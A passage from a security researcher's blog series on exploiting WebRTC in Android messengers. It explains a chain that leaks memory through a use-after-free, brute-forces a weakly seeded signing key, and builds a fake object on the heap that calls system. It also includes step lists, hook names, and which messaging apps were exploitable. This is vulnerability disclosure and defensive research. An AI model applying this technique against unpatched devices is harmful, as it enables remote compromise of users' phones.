Notice that the second call to sctp_m_freem is missing a return, so the m_ack variable can be used after it is freed. After finding this bug, I noticed that it had been patched in more recent versions of usrsctp and WebRTC. I later learned that it had been reported by another Googler, Mark Wodrich, as Bug 376 in usrsctp on September 19, 2019.

Revealing Memory with Bug 376


Two important questions in analyzing a use-after-free bug are what is freed and how it is used. In Bug 376, the freed object is an mbuf structure, a type which is used to store the contents of inbound and outbound packets. The mbuf structure starts with a substructure, m_hdr, which is defined as follows.

struct m_hdr {
    struct mbuf *mh_next;         /* next buffer in chain */
    struct mbuf *mh_nextpkt;      /* next chain in queue/record */
    caddr_t      mh_data;         /* location of data */
    int          mh_len;          /* amount of data in this mbuf */
    int          mh_flags;        /* flags; see below */
    short        mh_type;         /* type of data in this mbuf */
    uint8_t      pad[M_HDR_PAD];  /* word align */
};

Now, how is this structure used? Looking through the rest of the ASCONF handling, I found that the freed m_ack buffer is eventually added to an outbound packet queue to acknowledge the packet that was sent.

TAILQ_INSERT_TAIL(&stcb->asoc.asconf_ack_sent, ack, next);

This made it very likely that this bug could be used to reveal memory of a remote peer if the freed mbuf structure was replaced with a structure containing a pointer to memory that itself contains pointers, for example the SctpTransport pointer revealed by CVE-2020-6514.

I tried to do this by sending RTP packets of the same size as the mbuf structure. There’s a nice trick for making a lot of allocations of a specific size that don’t get freed in WebRTC: video packets get stored in a list before they are assembled into frames, so if the end of a frame is never sent, they will get stored forever, so long as a maximum number of packets is never hit. Unfortunately, this led to an unexpected problem. OpenSSL, which is used by WebRTC, happened to have some heap allocations of the same size as an mbuf structure, and if one of them happened to be allocated in the place of the freed mbuf structure, it would get written to in the mbuf send process, which for some reason would lead to an irrecoverable state in OpenSSL. The application didn’t crash; it would just get stuck in some sort of loop and refuse to accept any more connections.

So I decided it would be better to have the memory replacing the mbuf structure allocated by usrsctp itself. SCTP allows packets containing any number of chunks to be sent to a host, and in most cases they are processed as if they were a sequence of packets. Even better, the outbound packet queue that the freed mbuf structure is added to does not send any packets until all chunks in the current packet have been processed. This means that it should be possible to send a packet that contains a chunk that triggers the bug, followed by a chunk that sets the freed memory to the needed values before it is sent back to the attacker. Since no network traffic needs to occur between when the mbuf structure is freed and when its memory is safely reallocated, this avoids the problem with OpenSSL.

Unfortunately, there are very few calls to malloc in usrsctp with sizes that are controllable by incoming traffic, and none of them allow the entire packet contents to be specified. The best I could find was in the processing of a data stream reset chunk. The code is as follows, with some parts removed for clarity.

if (asoc->str_reset_seq_in == seq) {
    len = ntohs(req->ph.param_length);
    number_entries = ((len - sizeof(struct sctp_stream_reset_out_request)) / sizeof(uint16_t));
    tsn = ntohl(req->send_reset_at_tsn);
    asoc->last_reset_action[1] = asoc->last_reset_action[0];
    if (...) {
        ...
    } else if (SCTP_TSN_GE(asoc->cumulative_tsn, tsn)) {
        /* we can do it now */
        ...
    } else {
        /*
         * we must queue it up and thus wait for the TSN's
         * to arrive that are at or before tsn
         */
        struct sctp_stream_reset_list *liste;
        int siz;

        siz = sizeof(struct sctp_stream_reset_list) + (number_entries * sizeof(uint16_t));
        SCTP_MALLOC(liste, struct sctp_stream_reset_list *, siz, SCTP_M_STRESET);
        if (liste == NULL) {
            /* gak out of memory */
            asoc->last_reset_action[0] = SCTP_STREAM_RESET_RESULT_DENIED;
            sctp_add_stream_reset_result(chk, seq, asoc->last_reset_action[0]);
            return;
        }
        liste->seq = seq;
        liste->tsn = tsn;
        liste->number_entries = number_entries;
        memcpy(&liste->list_of_streams, req->list_of_streams, number_entries * sizeof(uint16_t));
        TAILQ_INSERT_TAIL(&asoc->resetHead, liste, next_resp);

This code allocates the liste structure, which can be used to replace the freed mbuf structure. One really lucky feature is that the next_resp property, which lines up with the mh_next property of the mbuf structure, happens to be of the correct type, also mbuf. This would cause problems if it were another type, as usrsctp iterates through the entire mbuf chain before sending a packet.

A less lucky feature is that the properties that line up with the mh_data property of the mbuf structure happen to be the current reset sequence number and the transmission sequence number (TSN). Both are subject to a number of checks in this method. The reset sequence number needs to be exactly equal to the sequence number set when the connection was initialized, either in an INIT or COOKIE_ECHO chunk, and also needs to be equal to the lower four bytes of the SctpTransport pointer. This check can be passed by sending a COOKIE_ECHO chunk that sets the reset sequence number to the needed value before triggering the bug.

More challenging is the check that is performed on the TSN. It is compared to the cumulative TSN, which is originally set to the same value as the reset sequence number. The actual comparison performed is a ‘sequence number greater than’, which determines whether one value is ahead of or behind another value, assuming sequence numbers that roll over to zero when all bits are set. For example, if the current sequence number is 0xFFFFFFFF, the value 2 would pass a  ‘sequence number greater than’ check, but the values 0xFFFFFFFE and 0x80000001 would fail. The TSN read out of the incoming packet has to be the top four bytes of the SctpTransport pointer, meanwhile the cumulative TSN has to be the bottom four bytes of this pointer because it is the same value as the reset sequence number. So this is actually a comparison between the two halves of the pointer. The TSN is a small number, less than 0x80 because it is the top of a pointer, so this comparison will return true roughly whenever bit 31 of the pointer is not set, and return the desired outcome of false roughly whenever it is set.
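To make the check concrete, the following is a minimal sketch of a serial-number "greater than" comparison of the kind described above; it is illustrative only and not the exact usrsctp macro, and the function name is mine.

#include <stdbool.h>
#include <stdint.h>

/* Serial-number "greater than": true if a is ahead of b, assuming 32-bit
 * sequence numbers that wrap around to zero. */
static bool tsn_gt(uint32_t a, uint32_t b) {
    /* The unsigned subtraction wraps, and reinterpreting the difference as
     * signed tells us which half of the number circle a falls into
     * relative to b. */
    return (int32_t)(a - b) > 0;
}

/* With b = 0xFFFFFFFF, as in the example above:
 *   tsn_gt(0x00000002, 0xFFFFFFFF) -> true
 *   tsn_gt(0xFFFFFFFE, 0xFFFFFFFF) -> false
 *   tsn_gt(0x80000001, 0xFFFFFFFF) -> false
 */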

Bit 31 of the pointer is determined randomly by ASLR as well as where the SctpTransport instance is allocated on the heap, which means it is set about 50% of the time. Normally, I would be okay with an exploit being 50% effective, because that means it would probably succeed with a few tries, but in this case, that’s not true because it will have the tendency to fail again and again on the same ASLR layout. ASLR layout is determined when an Android device is started up, and doesn’t change again until it is rebooted. So I needed a way to change the cumulative TSN after the reset sequence number has been set.

It turns out that this is possible using the FWD_TSN chunk type, which allows a peer to request that another peer move its cumulative TSN up to 4096 bytes forward. By sending this chunk type repeatedly, it's possible to move the cumulative TSN forward enough that bit 31 flips. This takes quite a few chunks, but by combining many chunks into each packet and sending the packets as fast as possible, the bit can be flipped in a few seconds.
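For a rough sense of the cost, here is a back-of-the-envelope sketch of how many maximum-size FWD_TSN advances are needed; the 4096-per-chunk limit is taken from the description above, and the helper is purely illustrative.

#include <stdint.h>

/* How many FWD_TSN advances of 4096 each are needed before bit 31 of the
 * cumulative TSN changes value. */
static uint64_t fwd_tsn_chunks_needed(uint32_t cum_tsn) {
    /* Distance, moving forward with wrap-around, to the next point where
     * bit 31 flips: 0x80000000 to set it, or 0x0 (after a wrap) to clear it. */
    uint32_t next_flip = (cum_tsn & 0x80000000u) ? 0x00000000u : 0x80000000u;
    uint32_t distance = next_flip - cum_tsn;  /* unsigned wrap-around */
    return (distance + 4095u) / 4096u;        /* ceiling division */
}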

Putting this all together, the bug can be used to make the target device send back the memory of the SctpTransport instance, which contains a pointer to the class’s vtable, finally giving the location of the WebRTC library and breaking ASLR.

Thinking about it a bit, I didn’t think the WebRTC library would be the best library to use for my exploit, as it’s not unusual for WebRTC integrators to statically link it with other libraries and use all sorts of toolchains. It would be easier to know the location of libc, which comes from the Android system and has less variation. So I added a second usage of this bug that reads the location of malloc from the global offset table, which is a fixed offset from the SctpTransport vtable that has already been read. This allows the location of libc to be calculated.

Moving the Instruction Pointer (Again)


In Part 1, I figured out how to use an RTP memory corruption bug to move the instruction pointer, but after I filed CVE-2020-6514, Jann Horn suggested that it might be possible to use this bug to move the instruction pointer as well. When WebRTC uses the SctpTransport pointer as an address, it doesn’t just use it to identify the connection, but it actually casts the pointer to class SctpTransport, and makes virtual calls on it when sending outbound packets received from usrsctp.

Meanwhile, usrsctp usually determines the address for outbound packets based on identifiers in the packet, but there is one situation where it extracts the address from the packet itself: when processing COOKIE_ECHO chunks. Normally, it wouldn't be possible to put an untrusted pointer in this chunk type, as these chunks are usually echoed from an incoming packet and need to be signed. However, Jann noticed that the random number generation for the signing key is very weak. The following code gets called when usrsctp is initialized.

srandom(getpid()); 

The secret key is then generated by calling rand.

The INIT chunk sent when starting an SCTP connection contains a randomly generated key used for authentication, generated by the same random number generator used for the secret key. I wrote a script that determines the value of the remote PID based on this key, by calling srand on every number between 0 and 70 000, and seeing which one causes the random number generator to produce the same authentication key. It is then possible to infer the value of the secret key.
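As an illustration of this brute force, here is a minimal C sketch. It is not the actual exploit script (which drives the attack through Frida hooks); it assumes the brute-forcing machine uses the same srandom()/random() implementation as the target, and the key length and extraction logic are placeholders.

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Number of 32-bit words in the observed authentication key; illustrative. */
#define KEY_WORDS 4

/* Try every plausible PID as the srandom() seed until the generated values
 * reproduce the random key observed in the peer's INIT chunk. Returns -1 if
 * no seed in the searched range matches. */
static int recover_pid(const uint32_t observed_key[KEY_WORDS]) {
    for (int pid = 0; pid < 70000; pid++) {
        uint32_t candidate[KEY_WORDS];
        srandom((unsigned int)pid);
        for (int i = 0; i < KEY_WORDS; i++)
            candidate[i] = (uint32_t)random();
        if (memcmp(candidate, observed_key, sizeof(candidate)) == 0)
            return pid;  /* same seed, same key stream, same secret key */
    }
    return -1;
}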

This key now allows the attacking device to send COOKIE_ECHO chunks with any contents, including changing the address to a custom pointer. This allows the instruction pointer to be moved, as a virtual call will be made on whatever address is provided the next time an outbound packet is sent, which happens immediately when the peer responds with a COOKIE_ACK. In the above section, I also discussed using COOKIE_ECHO packets to change the reset sequence number, while glossing over how I was actually sending them. It was using this same method.

I now had two possible methods for setting the instruction pointer in the exploit. I chose to move forward with this one, as it uses usrsctp, which is also necessary to break ASLR, meanwhile the RTP one uses a different feature. I felt that reducing the number of features needing to be enabled for this exploit to work would increase the number of applications it worked on, as sometimes applications disable specific WebRTC features.

Putting it All Together


Having all the necessary capabilities for an exploit, I then needed to put them all together. My general strategy was to make a fake object on the heap at a known location, and then make a virtual call on that object. The fake object would have a fake vtable in the same buffer that would point to system, which would run a shell command.

One missing piece is how to populate heap memory at a known location. One possibility was to use RTP to allocate memory of the same size as the SctpTransport object, hoping it gets allocated at the address directly after the object, or at a predictable location. I tried this, and it worked maybe 50% of the time, but considering I had a way to read memory, I thought I could do better.

I noticed that the SctpTransport class contains a CopyOnWriteBuffer object named partial_incoming_message_ that is sometimes used to store incoming SCTP data. SCTP supports data fragmentation, and usrsctp passes incomplete fragmented packets to WebRTC if they get above a certain size. These are stored in the partial_incoming_message_ object until the rest of the packet is received. So I thought if I sent the data for the fake object over SCTP to the target device, it would eventually populate this buffer, and I could read the address. (Note that this actually requires two reads, as there are two levels of indirection between a CopyOnWriteBuffer object and its backing data.)
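Conceptually, the double dereference looks like the sketch below; read64() stands in for the use-after-free read primitive, and the two offsets are placeholders whose real values depend on the WebRTC build.

#include <stdint.h>

/* Hypothetical wrapper around the memory-disclosure primitive: returns the
 * 8 bytes at `addr` in the target process. */
extern uint64_t read64(uint64_t addr);

/* Placeholder offsets, to be determined from the target binary. */
static const uint64_t kPartialMsgOffset = 0x0;   /* SctpTransport -> buffer object */
static const uint64_t kBackingDataOffset = 0x0;  /* buffer object -> backing bytes */

/* Two reads resolve the address of the attacker-filled backing data. */
static uint64_t backing_buffer_addr(uint64_t sctp_transport) {
    /* first level of indirection: the storage object referenced by the
     * embedded partial_incoming_message_ buffer */
    uint64_t storage = read64(sctp_transport + kPartialMsgOffset);
    /* second level: the pointer to the actual byte array */
    return read64(storage + kBackingDataOffset);
}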

I tried this, and it worked, but there was another problem. In order to create a fake object with a fake vtable, the fake object needed to reference itself, but this method only allowed me to know the location of the memory after it had been written to and couldn’t be changed. I looked a bit closer at how this functionality works. The code for setting the buffer is as follows.

transport->partial_incoming_message_.AppendData(
    reinterpret_cast<uint8_t*>(data), length);
...
if (!(flags & MSG_EOR) &&
    (transport->partial_incoming_message_.size() < kSctpSendBufferSize)) {
  return 1;
}
...
transport->invoker_.AsyncInvoke<void>(
    RTC_FROM_HERE, transport->network_thread_,
    rtc::Bind(&SctpTransport::OnInboundPacketFromSctpToTransport,
              transport, transport->partial_incoming_message_, params,
              flags));
transport->partial_incoming_message_.Clear();

What’s happening here is that incoming data is always immediately appended to the partial_incoming_message_ buffer, and then if it is an incomplete fragment, the function returns. Otherwise, it queues a thread to process the data, and then clears the buffer.

I started to wonder how clearing works, considering the data is still needed by the queued thread that might not be finished yet. It turns out that the CopyOnWriteBuffer class retains references to the data, and only deletes it if there are zero references left. Otherwise, it decrements the reference count and allocates new data of the current size for the buffer. This means it is possible to read the location of the partial_incoming_message_ buffer before data is written to it, because it is actually allocated during the clear. So long as the data written by AppendData is shorter or the same size as the largest size ever cleared, this memory will not be reallocated.

This allowed me to create a heap buffer at a known location and populate it. The last step was to figure out what to populate it with. I started out by filling it up with sequential numbers, and then using the address it crashed on to figure out what memory to change. After using the crash locations to create the fake vtable, I ended up with a crash on a branch to X8, and the only other controllable register was X21. X0 was of course set to the location of the fake vtable, as this crash was due to a virtual call, as were X1 and X23.

Astoundingly, libc had the perfect gadget for this situation.

do_nftw(char const*,int (*) …) + 0x138

LDR             X0, [X23,#0x30]
LDR             X1, [X23,#0x70]
BLR             X21

Setting X21 to the address of system, and copying a string parameter at an offset of 0x30 past the fake vtable, caused system to be called with the parameter!

To give a quick overview, here are the steps required for the exploit, in order:

  1. The PID is determined based on the key in the INIT chunk, and then the secret key is determined
  2. The vtable is read from the SctpTransport object
  3. The location of malloc is read from the global offset table
  4. The partial_incoming_message_ buffer is populated with data of the needed size
  5. The partial_incoming_message_ buffer is cleared, so a new buffer is allocated
  6. The address of the partial_incoming_message_ buffer is read from the SctpTransport object
  7. The address of the partial_incoming_message_ backing buffer is read from the buffer structure
  8. The partial_incoming_message_ buffer is populated with exploit data, based on the location of malloc
  9. The bug is triggered, making a virtual call to a gadget and then system

Now I had an exploit that worked in … the WebRTC sample Android application. Stay tuned for Part 3, where I explore what real Android applications the exploit works on.

Exploiting Android Messengers with WebRTC: Part 3

6 August 2020 at 18:05
By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514, discussed in this blog post, was fixed on July 14 with these CLs. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down.

Part 3: Which Messengers?

In Part 2, I described an exploit for WebRTC on Android. In this section, I explore which applications it works on.

The exploit

When writing the exploit, I originally altered the SCTP packets sent to the target device by altering the source of WebRTC and recompiling it. This wasn’t practical for attacking closed source applications, so I eventually switched to using Frida to hook the binary of the attacking device instead. Frida’s hooking functionality allows for code to be executed before and after a specific native function is called, which allowed my exploit to alter outgoing SCTP packets as well as inspect incoming ones. Functionally, it is equivalent to altering the source of the attacking client, but instead of the alterations being made in the source at compile time, they are made dynamically by Frida at run time. The source for the exploit is available here.

There are seven functions that the attacking device needs to hook, as follows.

usrsctp_conninput // receives incoming SCTP
DtlsTransport::SendPacket // sends outgoing SCTP
cricket::SctpTransport::SctpTransport // detects when SCTP transport is ready
calculate_crc32c // calculates checksum for SCTP packets
sctp_hmac // performs HMAC to guess secret key
sctp_hmac_m // signs SCTP packet
SrtpTransport::ProtectRtp // suppresses RTP to reduce heap noise

These functions can be hooked as symbols, or as offsets in the binary.

There are also three address offsets from the binary of the target device that are needed for the exploit to work.  The offset between the system function and the malloc function, as well as the offset between the gadget described in the previous post and the malloc function are two of these. These offsets are in libc, which is an Android system library, so they need to be determined based on the target device’s version of Android. The offset from the location of the cricket::SctpTransport vtable to the location of malloc in the global offset table is also needed. This must be determined from the binary that contains WebRTC in the application being attacked.
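The address arithmetic implied by these offsets is straightforward; the sketch below spells it out, with all three offset values left as placeholders that must be measured in the target's libc build and in the binary containing WebRTC.

#include <stdint.h>

static const int64_t kSystemMinusMalloc = 0;     /* libc: system - malloc         */
static const int64_t kGadgetMinusMalloc = 0;     /* libc: gadget - malloc         */
static const int64_t kMallocGotMinusVtable = 0;  /* app: malloc GOT slot - vtable */

/* Step 1: the leaked cricket::SctpTransport vtable pointer locates malloc's
 * GOT slot, which is then read with the memory-disclosure primitive. */
static uint64_t malloc_got_slot(uint64_t leaked_vtable) {
    return leaked_vtable + kMallocGotMinusVtable;
}

/* Step 2: the leaked malloc address locates system and the libc gadget. */
static uint64_t system_addr(uint64_t leaked_malloc) {
    return leaked_malloc + kSystemMinusMalloc;
}

static uint64_t gadget_addr(uint64_t leaked_malloc) {
    return leaked_malloc + kGadgetMinusMalloc;
}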

Note that the exploit scripts provided have a serious limitation: every time memory is read, it only works if bit 31 of the pointer is set. The reasons for this are explained in Part 2. The exploit script has an example of how to fix this and read any pointer using FWD_TSN chunks, but this is not implemented for every read. For testing purposes, I reset the device until the WebRTC library was mapped in a favorable location.

Android Applications

A list of popular Android applications that integrate WebRTC was determined by searching APK files on Google Play for a specific string in usrsctp. Roughly 200 applications with more than five million users appeared to use WebRTC. I evaluated these applications to determine whether they could plausibly be affected by the vulnerabilities in the exploit, and what the impact would be.

It turned out the ways applications use WebRTC are quite varied, but can be separated into four main categories.

  • Projection: the screen and controls of a mobile application are projected into a desktop browser with user consent for enhanced usability
  • Streaming: audio and video content is sent from one user to many users. Usually there is an intermediary server, so the sender does not need to manage possibly thousands of peers, and the content is recorded for later viewing
  • Browsers: all major browsers contain WebRTC to implement the JavaScript WebRTC API
  • Conferencing: two or more users communicate via audio or video in real time

The impact of the vulnerabilities used in the exploit is different for each of these categories. Projection is low risk, as a lot of user interaction is required to set up the WebRTC connection, and the user has access to both sides of the connection in the first place, so there is little to gain by compromising the other side. 

Streaming is also fairly low risk. While it’s possible that some applications use peer-to-peer connections when a stream has a low number of viewers, they usually use an intermediary server that terminates the WebRTC connection from the sending peer, and starts new connections with the receiving peers. This means that the attacker usually cannot send malformed packets directly to a peer. Even with a set-up where streaming is performed peer-to-peer, user interaction is required for the target to view the stream, and there’s often no way to limit who can access a stream. For this reason, streaming applications that use WebRTC are probably not useful for targeted attacks. Of course, it is possible that these vulnerabilities affect the servers used by streaming services, but this was not investigated in this research.

Browsers are almost certainly vulnerable to most bugs in WebRTC, because they allow a large amount of control over how it is configured. To exploit such a bug in a browser, an attacker would need to set up a host that acts like the other peer in the peer-to-peer connection, and convince the target to visit a webpage that starts a call to that host. In this case, the vulnerability would have a similar impact to other memory corruption vulnerabilities in JavaScript.

Conferencing is the highest risk usage of WebRTC, but the actual impact of a vulnerability depends a lot on how users of an application contact each other. The highest risk design is an application where any user can contact any other user based on an identifier. Some applications require the callee to have interacted in a specific way with the caller before a call can be made, which makes it harder to contact a target and generally reduces risk. Some applications require users to enter a code or visit a link to start a call, which has a similar effect. There is also a large group of applications where it is difficult or impossible to call a specific user, for example chat roulette applications, and applications which have features that allow a user to start a call to customer support.

For this research, I focused on conferencing applications that allow users to contact specific other users. This reduced my list of 200 applications to 14 applications, as follows.

[Table: the applications tested and their Play Store install counts. The application names were shown as logos in the original table; the counts listed were 1B, 1B, 1B, 500M, 100M, 100M/10M (OK and TamTam, similar apps by the same vendor), 100M, 50M, 10M, 10M, 10M, and 10M.]

This list was compiled on June 18, 2020. Note that a few applications were removed because their server was not operational on that day, or they were very difficult to test (for example, required watching multiple ads to make a single call).

One application tested will not be identified in this blog post, as a serious additional vulnerability was discovered in the process of testing that has not yet been fixed or reached its disclosure deadline. This blog post will be updated when the disclosure deadline has passed. Update (2020-10-14): The affected application was Mocha. We discovered this vulnerability.

Testing the Exploit

The following section describes my attempts to test the exploit against the above applications. Please note that due to the number of applications, limited time was spent on each, so there is no guarantee that every attack against WebRTC was considered. While I am very confident that applications found to be exploitable are indeed exploitable, I am less confident about applications found to be not exploitable. If you need to know whether a specific application is vulnerable for the purposes of protecting users, please contact the vendor instead of relying on this post.

Signal

I started off by testing Signal because it is the only open-source application on this list. Signal integrates WebRTC as a part of a library called ringrtc. I built ringrtc and then Signal with symbols, and then hooked the needed symbols with the Frida script on the attacker device. I tried the exploit and it worked about 90% of the time!




This attack did not require any user interaction with the target device because Signal starts the WebRTC connection before an incoming call is answered, and this connection can accept incoming RTP and SCTP. The exploit is not 100% reliable on Signal and other targets because Bug 376 requires that a freed heap allocation is replaced with the next allocation of the same size performed by the thread, and occasionally another thread will do an allocation of the same size in the meantime. Failure results in a crash that is usually not evident to the user because the process respawns, but a missed call will appear.

This exploit was performed on Signal 4.53.6 which was released on January 13, 2020, as Bug 376 had already been patched in Signal by the time I finished the exploit. CVE-2020-6514 was also fixed in later versions, and ASCONF has also been disabled in usrsctp, so the code that caused Bug 376 is no longer reachable. Signal has also recently implemented a feature that requires user interaction for the WebRTC connection to be started when the caller is not in the callee’s contacts. Signal has also stopped using SCTP in their beta version, and plans to add this change to the release client once it is tested. The source for this exploit is available here.

Google Duo


Duo was also an interesting target, as it is preinstalled on so many Android devices. It dynamically links the Android WebRTC library, libjingle_peerconnection_so.so with no obvious modifications. I reverse engineered this library in IDA to find the location of all the functions that needed to be hooked, and then modified the Frida script to hook them based on their offsets from an exported symbol. I also modified the offset between the cricket::SctpTransport vtable and the global offset table, as it was different than in Signal. The exploit also worked on Duo. Source for the Duo exploit is available here.



This vulnerability did not require any user interaction, as like Signal, Duo starts the WebRTC connection before a call is answered.

The exploit was tested on version 68.0.284888502.DR68_RC09 which was released on December 15, 2019. The vulnerability has since been fixed. Also, at the time this application was released, it was possible for Duo to call any Android device with Google Play Services installed, regardless of whether Duo had been installed. This is no longer the case. A user now needs to set up Duo and have the caller in their contacts for an incoming call to be received.

Google Hangouts


While Google Hangouts uses WebRTC, it does not use data channels, and does not exchange SDP in order to set up calls, so there is no obvious way to enable them from a peer. For that reason, the exploit does not work on Hangouts.

Facebook Messenger


Facebook Messenger is another interesting target. It has a large number of users, and according to its documentation, any user can call any other user based on their mobile number. Facebook Messenger integrates WebRTC into a library called librtcR11.so, which dynamically links to usrsctp from another library, libxplat_third-party_usrsctp_usrsctpAndroid.so. Facebook Messenger downloads these libraries dynamically as opposed to including them in the APK, so it is difficult to identify the version I examined, but it was downloaded on June 22, 2020. 

The librtcR11.so library appears to use a version of WebRTC that is roughly six years old, from before the class cricket::SctpTransport existed. That said, the analogous class cricket::DataMediaChannel appeared to be vulnerable to CVE-2020-6514. The libxplat_third-party_usrsctp_usrsctpAndroid.so library appears to be more modern, but contains the vulnerable code for Bug 376. However, it does not appear to be possible to reach this code from Facebook Messenger, as it is set to use RTP data channels as opposed to SCTP data channels, and does not accept attempts to change the channel type via the Session Description Protocol (SDP). While it is not clear whether the motivation behind this design is security, this is a good example of how restricting attacker access to features can reduce an application's vulnerability. Facebook also waits until a call is answered before starting the WebRTC connection, which further reduces the exploitability of any WebRTC vulnerabilities that affect it.

Interestingly, Facebook Messenger also contains a more modern version of WebRTC in a library called librtcR20.so, but it does not appear to be used by the application. It is possible to get Facebook Messenger to use the alternate library by setting a system property on Android, but I could not find a way an attacker could cause a device to switch libraries.

Viber


Like Facebook Messenger, Viber version 13.3.0.5 appeared to contain the vulnerable code, but the application disables SCTP when the PeerConnectionFactory is created. This means an attacker cannot reach the vulnerable code.

VK


VK is a social networking app released by Mail.ru in which users have to explicitly allow specific other users to contact them before each user is allowed to call them. I tested my exploit against VK, and it required some modifications to work. To start, VK doesn’t use data channels as a part of its WebRTC connection, so I had to enable it. To do this, I wrote a Frida script that hooks nativeCreateOffer in Java, and makes a call to createDataChannel before the offer is created. This was sufficient to enable SCTP on both devices, as the target device determines whether to enable SCTP based on the SDP provided by the attacker. The version of WebRTC was also older than the one I wrote the exploit for. WebRTC doesn’t contain any version information, so it is difficult to tell for sure, but the library appeared to be at least one year old based on log entries. This meant that some of the offsets in the ‘fake object’ used by the exploit were different. With a few changes, I was able to exploit VK.

VK sends an SDP offer to a target device to start a call, but the target does not return the SDP answer until the user has accepted the call, which means this exploit requires the target to answer the call before the WebRTC connection is started. This means the exploit will not work unless the target manually answers the call. In the video below, the exploit takes a fair amount of time to run after the user has answered. This is due to how I designed the exploit, and not due to fundamental limitations of the vulnerabilities it uses. In particular, the exploit waits for usrsctp to generate specific packets even though they could be generated more quickly by the exploit script, and also uses delays to avoid packet reordering when responses could be checked instead. It is likely that with enough effort, this exploit could run in less than five seconds. Also note that I altered the exploit to work with a single incoming call, as opposed to two incoming calls in the exploits above, as it is not realistic to expect a target to answer a call twice in quick succession. This didn’t require substantial changes to how the exploit works, though it does make the exploit code more complex and difficult to debug.



Regardless, the requirement that a user must choose to accept calls from an attacker before they can call, alongside the requirement that the user answer the call and stay on the line for a few seconds makes this exploit substantially less useful against VK compared to applications without these features.

Testing was performed against VK 6.7 (5631). Like Facebook, VK dynamically downloads its version of WebRTC, so it is difficult to specify its version, however testing was performed on July 13, 2020. VK has since updated their servers so that a user cannot start a call with SDP that contains data channels, so the exploit no longer works. Note that VK does not use WebRTC for two-party calls, only group calls, so I tested this exploit using a group call. The source for the exploit is available here.

OK and TamTam


OK and TamTam are similar messaging applications released by the same vendor, also Mail.ru. They use a dynamically downloaded version of WebRTC that is identical to the one used by VK. Since the library is exactly the same, my exploit also worked on OK, and I didn't bother also testing TamTam because it is so similar.



Like VK, OK and TamTam do not return the SDP answer until the target has answered the call by interacting with the phone, so this is not a fully remote exploit on OK and TamTam. OK also requires users to choose to accept messages from another user before the user can call them. TamTam is a bit more liberal, for example, if a user verifies a phone number, any user who has their phone number can contact them.

Testing was performed on version 20.7.7 of OK on Monday, July 13. SDP-only testing was performed on TamTam version 2.14.0. Since then, the servers for these applications have been updated so that SDP containing data channels cannot be used to start a call, so the exploit no longer works.

Discord
Discord has documented its use of WebRTC thoroughly. The application uses an intermediary server for WebRTC connections, which means that it is not possible for a peer to send raw SCTP to another peer, which is required for the exploit to work. Discord also requires several clicks to enter a call. For these reasons, Discord is not affected by the vulnerabilities discussed in this post.

JioChat


JioChat  is a messaging application that allows for any user to call any other user based on phone number. Analyzing version 3.2.7.4.0211, it appeared that its WebRTC integration contained both vulnerabilities, and the app exchanges the SDP offer and answer before the callee accepts the incoming call, so I expected the exploit to work without user interaction. However, this was not the case when I tested it, and it turns out that JioChat uses a different strategy to prevent the WebRTC connection from starting until the callee has accepted the call. I was able to easily bypass this strategy, and get the exploit to work on JioChat.



Unfortunately, JioChat’s connection delay strategy introduced another vulnerability, which has been fixed but whose disclosure period has not yet expired. For this reason, details of how to bypass it will not be shared in this blog post. The source for the exploit without this functionality is available here. JioChat has recently updated their servers so that SDP containing data channels cannot be used to start a call, meaning that the exploit no longer works on JioChat.

Slack and ICQ


Slack and ICQ are similar in that they both integrate WebRTC, but do not use the transport features of the library (note that Slack doesn’t integrate WebRTC directly for audio calls; it integrates Amazon Chime, which in turn integrates WebRTC). They both use WebRTC for audio processing only, but implement their own transport layer and do not use WebRTC’s RTP and SCTP implementations. For this reason, they are not vulnerable to the bugs discussed in this blog post, or to many other WebRTC bugs.

BOTIM


BOTIM has an unusual design that prevents the exploit from working. Instead of calling createOffer and exchanging SDP, each peer generates its own SDP based on a small amount of information from the peer. SCTP is not used by this application by default, and it was not possible to use SDP to turn it on. Therefore, it was not possible to use this exploit. BOTIM does appear to have a mode where it exchanges SDP with a peer, but I could not figure out how to enable it.

Other Application


The exploit worked in a fully remote fashion on one other application, but setting up the exploit revealed an obvious additional serious vulnerability in the application. Details of the exploit’s behavior on the application will be released after the disclosure period has expired for the vulnerability.

Discussion

The Risk of WebRTC

Out of the 14 applications analyzed, WebRTC enabled a fully remote exploit on four applications, and a one-click exploit on two more. This highlights the risk of including WebRTC in a mobile application. WebRTC does not pose a substantially different risk than other video conferencing solutions, but the decision to include video conferencing in an application introduces a large remote attack surface that wouldn’t be there otherwise. WebRTC is one of the few fully remote attack surfaces of a mobile application, and of Android in general. It is likely the highest risk component in almost every application that uses it for video conferencing.

Video conferencing is vital to the functionality of some applications, but in others it is an ‘extra’ that is rarely used. Low usage does not make video conferencing any less of a risk to users. It is important for software makers to consider whether video conferencing is a truly necessary part of their application, with a full understanding of the risk it presents to users.

WebRTC Patching

This research showed that many applications fall behind with regard to applying security updates to WebRTC. Bug 376 was fixed in September of 2019, yet only two of the 14 applications analyzed had patched it. There were several factors that led to this.

To start, usrsctp does not have a formal process for identifying and communicating vulnerabilities. Instead, Bug 376 was fixed like any other bug, so the code was not pulled into WebRTC until March 10, 2020. Even after it was patched, the bug was not noted in the Security Notes for the Chrome Stable channel, which is where WebRTC tells developers to look for security updates. This means that developers of applications that use an older version of WebRTC and cherry-pick fixes, or applications that include usrsctp separately from WebRTC, would not be aware of the need to apply this patch.

This is not the full story though, as many applications include WebRTC as an unmodified library, and there have been other WebRTC vulnerabilities included in the Chrome Security Notes since March 2020. Another contributing factor is that until 2019, WebRTC did not provide any security patching guidance to integrators; in fact, their website inaccurately said that no vulnerabilities had ever been reported in the library. This occurred because WebRTC security bugs are generally filed in the Chromium bug tracker, and there was no process for considering these bugs' impact on non-browser integrators at the time. Many of the applications I analyzed had versions of WebRTC that predated this, so it is likely that the legacy of this incorrect guidance still causes applications to not update WebRTC. While WebRTC has done a lot to make it easier for integrators to patch WebRTC, for example allowing large integrators to apply for advance notice of vulnerabilities, there is still likely a long tail of integrators who have only seen the old guidance. Of course, there is no guarantee that integrators would have followed better guidance if it was available, but considering that for a long time it was very difficult for an integrator to know when and how to update WebRTC even if they wanted to, it is likely it would have had an impact.

Integrators also have a responsibility to keep WebRTC up to date with security fixes, and many of them have failed in this area. It was surprising to see so many versions of WebRTC that are well over a year old. Developers should monitor every library they integrate for security updates, and apply them promptly.

Application Design


